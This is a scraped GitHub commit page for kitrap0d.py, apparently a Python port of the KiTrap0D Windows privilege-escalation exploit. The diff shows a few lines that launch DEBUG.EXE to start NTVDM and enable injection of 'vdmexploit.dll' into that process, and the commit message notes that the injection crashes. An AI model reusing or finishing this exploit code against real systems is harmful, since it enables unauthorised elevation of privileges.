Skip to content

Commit

Permalink
Seems to match, but crashes on dll injection 100%
Browse files Browse the repository at this point in the history
  • Loading branch information
psychomario committed May 31, 2012
1 parent 6210dc1 commit 23afc14
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions kitrap0d.py
Original file line number Diff line number Diff line change
Expand Up @@ -73,7 +73,7 @@ def kitrap0d():
startupinfo.cb = ctypes.sizeof(startupinfo)
kernel32.CreateProcessA(
"C:\\WINDOWS\\SYSTEM32\\DEBUG.EXE",
None,
"C:\\WINDOWS\\SYSTEM32\\DEBUG.EXE",
None,
None,
False,
Expand All @@ -91,4 +91,4 @@ def kitrap0d():
kernel32.CloseHandle(process_information.hThread)
kernel32.CloseHandle(process_information.hProcess)
ntvdminject = dllinject.Process(handle=ntvdm)
#print ntvdminject.inject("vdmexploit.dll")
print ntvdminject.inject("vdmexploit.dll")

0 comments on commit 23afc14

Please sign in to comment.